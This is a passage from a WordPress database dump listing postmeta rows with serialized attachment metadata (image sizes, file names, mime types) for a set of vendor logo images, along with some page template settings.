";a:4:{s:4:\"file\";s:24:\"Seagate-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Seagate-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Seagate-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Seagate-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Seagate-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Seagate-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Seagate-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1691,1710,'_wp_attached_file','2018/12/Shopify-Logo.jpg'),(1692,1710,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Shopify-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Shopify-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Shopify-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Shopify-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Shopify-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Shopify-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Shopify-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Shopify-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1693,1711,'_wp_attached_file','2018/12/Veritas-Logo.jpg'),(1694,1711,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Veritas-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Veritas-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Veritas-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Veritas-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Veritas-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Veritas-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Veritas-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Veritas-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Veritas-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1695,1690,'_wp_page_template','template-fullwidth.php'),(1696,1690,'_hide_page_title',''),(1697,1690,'_hide_header',''),(1698,1690,'_hide_footer',''),(1699,1690,'_hide_breadcrumb',''),(1700,1690,'_cover',''),(1701,1690,'_show_excerpt',''),(1702,1690,'_wc_apply_product',''),(1703,1690,'_yoast_wpseo_content_score','60'),(1704,1713,'_wp_attached_file','2018/12/VMWARE-logo.jpg'),(1705,1713,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/VMWARE-logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"VMWARE-logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"VMWARE-logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"VMWARE-logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"VMWARE-logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"VMWARE-logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"VMWARE-logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"VMWARE-logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1706,1714,'_wp_attached_file','2018/12/Wacom-logo.jpg'),(1707,1714,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/Wacom-logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Wacom-logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Wacom-logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Wacom-logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Wacom-logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Wacom-logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Wacom-logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Wacom-logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"Wacom-logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1708,1715,'_wp_attached_file','2018/12/Zebra-Logo.jpg'),(1709,1715,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:22:\"2018/12/Zebra-Logo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Zebra-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Zebra-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Zebra-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Zebra-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Zebra-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Zebra-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Zebra-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"Zebra-Logo-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1712,1717,'_wp_attached_file','2018/12/OpenVoice-Logo.png'),(1713,1717,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:26:\"2018/12/OpenVoice-Logo.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"OpenVoice-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"OpenVoice-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1714,1718,'_wp_attached_file','2018/12/Symantec-Logo.jpg'),(1715,1718,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/Symantec-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Symantec-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Symantec-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Symantec-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Symantec-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Symantec-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Symantec-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Symantec-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1716,1719,'_wp_attached_file','2018/12/Toughbook-Logo-V2.jpg'),(1717,1719,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:29:\"2018/12/Toughbook-Logo-V2.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Toughbook-Logo-V2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Toughbook-Logo-V2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Toughbook-Logo-V2-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Toughbook-Logo-V2-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"Toughbook-Logo-V2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"Toughbook-Logo-V2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:29:\"Toughbook-Logo-V2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:27:\"Toughbook-Logo-V2-20x13.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1718,1720,'_wp_attached_file','2018/12/Trend-Micro-Logo.jpg'),(1719,1720,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:28:\"2018/12/Trend-Micro-Logo.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Trend-Micro-Logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Trend-Micro-Logo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Trend-Micro-Logo-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Trend-Micro-Logo-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"Trend-Micro-Logo-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"Trend-Micro-Logo-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"Trend-Micro-Logo-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1884,1770,'_wp_attached_file','2018/12/Belkin-Logo.png'),(1885,1770,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:23:\"2018/12/Belkin-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Belkin-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Belkin-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Belkin-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Belkin-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"Belkin-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"Belkin-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"Belkin-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"Belkin-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1886,1771,'_wp_attached_file','2018/12/DELL-EMC-logo.png'),(1887,1771,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:25:\"2018/12/DELL-EMC-logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"DELL-EMC-logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"DELL-EMC-logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"DELL-EMC-logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"DELL-EMC-logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"DELL-EMC-logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"DELL-EMC-logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"DELL-EMC-logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"DELL-EMC-logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1888,1772,'_wp_attached_file','2018/12/Infocus-Logo.png'),(1889,1772,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:681;s:4:\"file\";s:24:\"2018/12/Infocus-Logo.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Infocus-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Infocus-Logo-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Infocus-Logo-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Infocus-Logo-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"Infocus-Logo-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"Infocus-Logo-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:24:\"Infocus-Logo-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"Infocus-Logo-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\"